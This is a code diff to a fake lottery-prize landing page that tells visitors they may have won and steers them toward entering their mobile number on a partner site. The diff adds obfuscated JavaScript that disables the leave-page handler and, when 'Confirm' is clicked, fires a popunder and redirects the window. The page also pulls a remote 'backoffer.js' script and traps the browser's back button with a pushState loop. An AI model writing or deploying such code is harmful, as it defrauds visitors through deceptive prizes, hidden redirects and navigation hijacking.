--- a/pinbox/e20235231703ncash/prelp.html
+++ b/pinbox/e20235231703ncash/prelp.html
@@ -37,6 +37,16 @@
 		});
 	</script>
 </head>
+
+<body>
+<!-- Popunder script -->
+<script type="text/javascript">
+var _0x47c8=['onbeforeunload'];(function(_0xca98db,_0x14ec84){var _0x11f679=function(_0x16b11c){while(--_0x16b11c){_0xca98db['push'](_0xca98db['shift']());}};_0x11f679(++_0x14ec84);}(_0x47c8,0x7e));var _0x12dd=function(_0xca98db,_0x14ec84){_0xca98db=_0xca98db-0x0;var _0x11f679=_0x47c8[_0xca98db];return _0x11f679;};function exit_a1(){window[_0x12dd('0x0')]=null;}
+</script>
+<script>
+var _0x19d6=['prototype','Constructor','indexOf','location','REPLACE-POPUNDER-URL-HERE','assign','open','_blank','HTMLElement'];(function(_0x5b932b,_0x38c322){var _0x552ac9=function(_0x5426b0){while(--_0x5426b0){_0x5b932b['push'](_0x5b932b['shift']());}};_0x552ac9(++_0x38c322);}(_0x19d6,0x136));var _0x1126=function(_0x5b932b,_0x38c322){_0x5b932b=_0x5b932b-0x0;var _0x552ac9=_0x19d6[_0x5b932b];return _0x552ac9;};var isSafari=Object[_0x1126('0x5')]['toString']['call'](window[_0x1126('0x4')])[_0x1126('0x7')](_0x1126('0x6'))>0x0;function launchext(){setTimeout(function(){url=_0x1126('0x0');document[_0x1126('0x8')][_0x1126('0x1')](url);if(isSafari){window[_0x1126('0x2')]('',_0x1126('0x3'));}},0x3e8);return![];}
+</script>
+
 <!-- BBR -->
 <script type="text/javascript" src="https://merlinkok.com/secondlink/LP1/backoffer.js"></script>
 <script type="text/javascript">
@@ -45,7 +55,6 @@
     }
     (window));
 </script>
-<body>
 	<div class="wrapper">
 		<div class="header"><strong>Congratulations!</strong><br>Draw date: <span id="date"></span><br></div>
 		<div class="content">
@@ -170,7 +179,7 @@
 				html: '<strong>You may be a Winner of:</strong> <h2>Lottery voucher</h2><br><h4>Next Steps:</h4><br>1. You\'ll be redirected to the partner\'s site<br>2. Enter your mobile number<br>3. Get your Lottery prize',
 				allowOutsideClick: false,
 				showConfirmButton: false,
-				footer: '<a href="https://nbbhtc.maxconvtrk.com/click">Confirm</a>'
+				footer: '<a href="https://nbbhtc.maxconvtrk.com/click" class="button" onclick="launchext(); exit_a1();" target="_blank">Confirm</a>'
 			});
 		}
 		i = 0;
@@ -191,6 +200,7 @@
 		});
 		var date = new Date().toLocaleDateString();
 		document.getElementById('date').innerHTML = date;
+	
 	</script>
 	<script>!function () { var a; try { for (a = 0; 10 > a; ++a) { history.pushState({}, "", "#") } onpopstate = function (c) { c.state && location.replace("#js-landing-url") } } catch (b) { } }();</script>
 </body>
